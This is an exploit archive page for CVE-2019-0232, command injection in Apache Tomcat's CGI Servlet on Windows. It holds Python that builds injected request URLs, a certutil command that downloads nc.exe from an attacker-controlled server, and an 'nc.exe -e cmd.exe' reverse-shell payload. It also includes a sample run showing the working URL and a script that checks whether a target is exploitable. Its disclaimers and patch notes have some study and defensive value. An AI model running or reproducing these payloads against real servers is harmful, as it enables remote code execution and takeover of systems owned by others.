POC details: d075c5de4b07b2c7ce8d3433ea918162618dc2e9

Source
Related vulnerability
Title: Apache Tomcat operating-system command injection vulnerability (CVE-2019-0232)
Description: Apache Tomcat is a lightweight web application server from the Apache Software Foundation. It implements support for Servlets and JavaServer Pages (JSP). The CGI Servlet in Apache Tomcat 9.0.0.M1 through 9.0.17, 8.5.0 through 8.5.39 and 7.0.0 through 7.0.93 contains an operating-system command injection vulnerability. A remote attacker can exploit it to execute code.
Description
This is a revised and enhanced exploit for CVE-2019-0232.
Introduction
# **Exploit for Apache Tomcat CVE-2019-0232**

This script exploits **CVE-2019-0232**, a command injection in Apache Tomcat's CGI Servlet on Windows, by sending requests to a CGI batch file (here `ism.bat`) whose query string carries an extra command. It uses `certutil` to pull `nc.exe` (Netcat) onto the target and then runs it as a reverse shell back to the attacker.

### **Vulnerability Overview:**
- **CVE ID**: CVE-2019-0232
- **Affected Products**: Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 on Windows (fixed in 9.0.19, 8.5.40 and 7.0.94)
- **Description**: 
  - **CVE-2019-0232** is a command injection in Tomcat's CGI Servlet on Windows. When the servlet's `enableCmdLineArguments` option is true, a query string without `=` is split on `+` and passed to the script as command-line arguments without validation. Because `.bat` files are run through `cmd.exe`, a request such as `/cgi/ism.bat?&<command>` makes the shell run `<command>` after the batch file.
  - This script uses that to have the target download `nc.exe` from a server the attacker controls and then run it as a reverse shell.

### **Requirements:**
- **Python 3**: The script is designed for Python 3.x.
- **Netcat**: A copy of `nc.exe` served over HTTP from a host you control (the target fetches it with `certutil`), plus a Netcat listener on your machine to receive the reverse shell.
- **Apache Tomcat**: The target must run an unpatched version (see the affected ranges above) on Windows, with the CGI Servlet mapped and `enableCmdLineArguments` set to true.

### **How It Works:**
1. **Download `nc.exe`**: The script sends a crafted request to the vulnerable Tomcat server whose injected command runs `certutil` to download `nc.exe` (Netcat) from your web server onto the target.
2. **Reverse Shell**: A second request runs the downloaded `nc.exe` with `-e cmd.exe`, which connects back to your Netcat listener.
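The following is an added example (not the repository's own `exploit.py`) showing how the two requests above are encoded and how the CGI Servlet turns them into shell arguments. It only builds and inspects URLs; nothing is sent. The host, port and listener values are the README's sample values, and the script path `/cgi/ism.bat` is an assumption (it is whatever batch file the target exposes). The allow-list pattern used in `rejected_by_fix` is my reading of the default `cmdLineArgumentsDecoded` value in the fixed releases; confirm it against the CGI Servlet documentation for your version.

```python
import re
from urllib.parse import unquote

# Constructed example values from the README's sample run.  The CGI script
# path is an assumption: it is whatever .bat the target maps through the
# CGI servlet.
TARGET_HOST = "192.168.1.10"
TARGET_PORT = 8080
CGI_SCRIPT = "/cgi/ism.bat"


def cgi_arg_payload(argv):
    """Encode argv as a CGI command-line query string.

    Pre-fix Tomcat treats a query string that contains no '=' as CGI
    command-line arguments: it splits on '+' and URL-decodes each piece.
    A leading '&' glued to the first token makes cmd.exe run that token as
    a second command after the batch file.  Tokens containing whitespace,
    '+' or '=' would change how the servlet splits the string, so they
    are rejected rather than silently mangled.
    """
    if not argv:
        raise ValueError("argv must contain at least the program name")
    for tok in argv:
        if any(c.isspace() for c in tok) or "+" in tok or "=" in tok:
            raise ValueError(f"token {tok!r} cannot be passed as one argument")
    return "&" + "+".join(argv)


def payload_url(argv, host=TARGET_HOST, port=TARGET_PORT, script=CGI_SCRIPT):
    return f"http://{host}:{port}{script}?{cgi_arg_payload(argv)}"


def stage1_download(nc_host, nc_port):
    """Step 1: certutil fetches nc.exe from the attacker's web server."""
    return payload_url(["certutil", "-urlcache", "-split", "-f",
                        f"http://{nc_host}:{nc_port}/nc.exe", "nc.exe"])


def stage2_reverse_shell(listener_host, listener_port):
    """Step 2: the downloaded nc.exe connects back with cmd.exe attached."""
    return payload_url(["nc.exe", listener_host, str(listener_port),
                        "-e", "cmd.exe"])


def cgi_servlet_argv(query):
    """What the pre-fix CGI servlet hands to the shell: split the raw query
    on '+', drop empty pieces, URL-decode each piece."""
    return [unquote(part) for part in query.split("+") if part]


# Assumed default per-argument allow-list of the fixed releases
# (cmdLineArgumentsDecoded): letters, digits, '-', '.', '_' and '/'.
FIXED_ARG_PATTERN = re.compile(r"[a-zA-Z0-9\-._/]+")


def rejected_by_fix(argv):
    """Arguments a patched server would refuse; the leading '&' and the
    ':' in the download URL both fail the pattern, which is why the
    payload stops working once the fix is applied."""
    return [a for a in argv if not FIXED_ARG_PATTERN.fullmatch(a)]


if __name__ == "__main__":
    url1 = stage1_download("192.168.1.100", 80)
    url2 = stage2_reverse_shell("192.168.1.100", 1234)
    for url in (url1, url2):
        argv = cgi_servlet_argv(url.split("?", 1)[1])
        print(url)
        print("  shell sees:", argv)
        print("  rejected by fixed versions:", rejected_by_fix(argv))
```

Running the module prints both URLs, the argument vector the pre-fix servlet builds from each, and which of those arguments a patched server would reject.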

### **Usage:**

#### 1. Clone the repository:
```bash
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
```
#### 2. Run the script (the file in the repository snapshot is `CVE-2019-0232.py`) and answer its prompts, or edit the values at the top of the script:
```bash
python3 CVE-2019-0232.py
```
#### 3. You will be prompted to enter the following details:
```bash 
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
```
### Example:
```bash
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
```
Once executed successfully, you should have a reverse shell connection back to your Netcat listener.
### Disclaimer:
This script is intended for educational purposes only. Do not use it for malicious activities. Always obtain proper authorization before attempting any penetration testing or security auditing. Misuse of this script could result in legal consequences.

### Important Notes:
The target must be unpatched: the fix shipped in 9.0.19, 8.5.40 and 7.0.94, which validate each command-line argument against an allow-list (`cmdLineArgumentsDecoded`) that rejects the `&` this payload relies on, and default `enableCmdLineArguments` to false. The CGI Servlet is disabled by default, so the target must also have it mapped in `web.xml`.
The injected commands run with the privileges of the account Tomcat runs under, so that account's rights determine what the reverse shell can do; the script itself needs no special privileges on your machine.
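Before running the exploit, the two conditions above can be checked offline from the server banner and the deployed `web.xml`. The following is an added example (my code, not the repository's) that parses a Tomcat version string, compares it against the advisory ranges quoted at the top of this page, and reads the CGI Servlet mapping and `enableCmdLineArguments` value out of a `web.xml`. The `web.xml` embedded below is constructed for the example; the pre-fix defaults for a missing `enableCmdLineArguments` (true on 7.0.x/8.5.x, false on 9.0.x) follow the Tomcat advisory.

```python
import re
import xml.etree.ElementTree as ET

# Affected ranges as listed in the advisory on this page (inclusive).
AFFECTED = {7: ("7.0.0", "7.0.93"), 8: ("8.5.0", "8.5.39"), 9: ("9.0.0.M1", "9.0.17")}

CGI_SERVLET_CLASS = "org.apache.catalina.servlets.CGIServlet"

# Constructed sample web.xml: CGI servlet mapped under /cgi/* with
# command-line arguments explicitly enabled.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
  </servlet>
  <servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi/*</url-pattern>
  </servlet-mapping>
</web-app>"""


def parse_version(text):
    """'9.0.17' -> (9, 0, 17, 0, 0); '9.0.0.M1' -> (9, 0, 0, -1, 1).
    The fourth field makes milestone builds sort before the GA release
    of the same number, so 9.0.0.M1 <= 9.0.0 holds."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:\.M(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {text!r}")
    major, minor, patch, milestone = m.groups()
    if milestone is None:
        return (int(major), int(minor), int(patch), 0, 0)
    return (int(major), int(minor), int(patch), -1, int(milestone))


def version_in_advisory_range(version):
    v = parse_version(version)
    rng = AFFECTED.get(v[0])
    return rng is not None and parse_version(rng[0]) <= v <= parse_version(rng[1])


def version_from_banner(text):
    """Extract the version from a 'Server: Apache Tomcat/8.5.39' header or
    the footer of Tomcat's default error page; None if it is not Tomcat's."""
    m = re.search(r"Apache Tomcat/(\d+\.\d+\.\d+(?:\.M\d+)?)", text)
    return m.group(1) if m else None


def _local(tag):
    return tag.rsplit("}", 1)[-1]  # strip the web-app XML namespace


def cgi_servlet_config(web_xml):
    """Return (url_patterns, enableCmdLineArguments) for the CGI servlet,
    or None if CGIServlet is not declared.  The flag is None when the
    init-param is absent and the version-dependent default applies."""
    root = ET.fromstring(web_xml)
    name, enabled = None, None
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in servlet}
        if fields.get("servlet-class") != CGI_SERVLET_CLASS:
            continue
        name = fields.get("servlet-name")
        for param in servlet:
            if _local(param.tag) != "init-param":
                continue
            kv = {_local(c.tag): (c.text or "").strip() for c in param}
            if kv.get("param-name") == "enableCmdLineArguments":
                enabled = kv.get("param-value", "").lower() == "true"
    if name is None:
        return None
    patterns = []
    for mapping in root.iter():
        if _local(mapping.tag) != "servlet-mapping":
            continue
        kv = {_local(c.tag): (c.text or "").strip() for c in mapping}
        if kv.get("servlet-name") != name:
            continue
        patterns += [(c.text or "").strip() for c in mapping if _local(c.tag) == "url-pattern"]
    return patterns, enabled


def likely_exploitable(banner, web_xml):
    """Version in the advisory range, CGI servlet mapped, and command-line
    arguments effectively enabled.  Windows is still a separate assumption."""
    version = version_from_banner(banner)
    if version is None or not version_in_advisory_range(version):
        return False
    cfg = cgi_servlet_config(web_xml)
    if cfg is None or not cfg[0]:
        return False
    enabled = cfg[1]
    if enabled is None:  # pre-fix default differs by branch (see advisory)
        enabled = parse_version(version)[0] in (7, 8)
    return enabled
```

`likely_exploitable("Server: Apache Tomcat/8.5.39", SAMPLE_WEB_XML)` returns true; the same `web.xml` on `9.0.19` returns false because the version is outside the advisory range.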
#### Author:
Author: A!Z3N(Dharan)
Made with power!
### **License:**

This project is licensed under the **MIT License**. 

However, **use it at your own risk**. This code is provided for **educational purposes only**. By using this code, you agree to take full responsibility for any actions resulting from its use. Misuse or unauthorized use of this exploit may lead to legal consequences. **Always obtain proper authorization** before performing any security testing or penetration testing on any system.

You are free to use, modify, and distribute this code, but **only for ethical purposes**. The author is not responsible for any damage caused by this code. 

**Do not use this exploit without the explicit permission of the target system's owner.**

File snapshot

```
/data/pocs/d075c5de4b07b2c7ce8d3433ea918162618dc2e9 (4.0K)
├── CVE-2019-0232.py (2.6K)
└── README.md (3.9K)

0 directories, 2 files
```